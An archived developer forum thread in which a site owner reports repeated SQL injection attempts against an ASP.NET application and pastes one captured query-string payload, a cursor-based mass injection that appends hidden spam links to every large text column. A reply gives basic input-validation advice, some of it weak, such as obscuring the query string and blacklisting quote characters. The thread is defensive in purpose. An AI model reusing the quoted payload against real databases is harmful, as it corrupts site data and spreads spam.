locked
Someone try to break in to my database RRS feed

  • Question

  • User661479005 posted

    I have a application with userlogin and cms-system. 
    On all my pages there is a Sub Page_Error that send me an email when an error occur.

    For some weeks I receive daily error-mails from the application because some people try to write a SQL query in the querystring.

    I feel that we have done everything to avoid this kind of people to get in to our system but I would like to know if any of you have some experience about how to handle attacks like this. 

    Se an example here where somebody adds a query after wid=2 :

    id=55&wid=2';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''abortion%20pill%20prescription%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2BREPLACE(case%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''www.survivingediscovery.com@abortionpill''%20when%201%20then%20''www.nunosolutions.com@template''%20else%20''hannetoft.dk@template''%20end,''@'',char(47))%2B''%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''read%20here''%20when%201%20then%20''ordering%20abortion%20pills%20to%20be%20shipped%20to%20house''%20else%20''abortion%20pill''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20order%20abortion%20pill''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c--&sm=c

    Thursday, December 11, 2014 7:17 AM

Answers

  • User1508394307 posted

    Most likely it's an automatic scanner which tries to find vulnerabilities such as sql injections. You can't stop make it happen but you could try

    validate input and catch exceptions

    • use try..catch block so that exception is not happen and no email will be sent
    • validate values - so if wid is supposed to be an int value - then check it with int.tryparse(). If it's a string then check for maximum length or presense of ' or even compare against predefined list (e..g if only "1" or "2" is expected then it makes sense to check "if (wid=="1" || wid=="2")"
    • for other ideas read http://msdn.microsoft.com/en-us/library/ff648339.aspx 

    to confuse scanner you could

    • change pages so that instead of querystring you use either HTTP POST (form) or URL Rewrite (e.g. instead of having "page.aspx?id=55&wid=2" you could rewrite to "page.aspx/55/2")
    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Thursday, December 11, 2014 7:37 AM

All replies

  • User1508394307 posted

    Most likely it's an automatic scanner which tries to find vulnerabilities such as sql injections. You can't stop make it happen but you could try

    validate input and catch exceptions

    • use try..catch block so that exception is not happen and no email will be sent
    • validate values - so if wid is supposed to be an int value - then check it with int.tryparse(). If it's a string then check for maximum length or presense of ' or even compare against predefined list (e..g if only "1" or "2" is expected then it makes sense to check "if (wid=="1" || wid=="2")"
    • for other ideas read http://msdn.microsoft.com/en-us/library/ff648339.aspx 

    to confuse scanner you could

    • change pages so that instead of querystring you use either HTTP POST (form) or URL Rewrite (e.g. instead of having "page.aspx?id=55&wid=2" you could rewrite to "page.aspx/55/2")
    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Thursday, December 11, 2014 7:37 AM
  • User661479005 posted

    Hi Smirnov


    Thank you very much for your answer and the link.

    Thursday, December 11, 2014 9:17 AM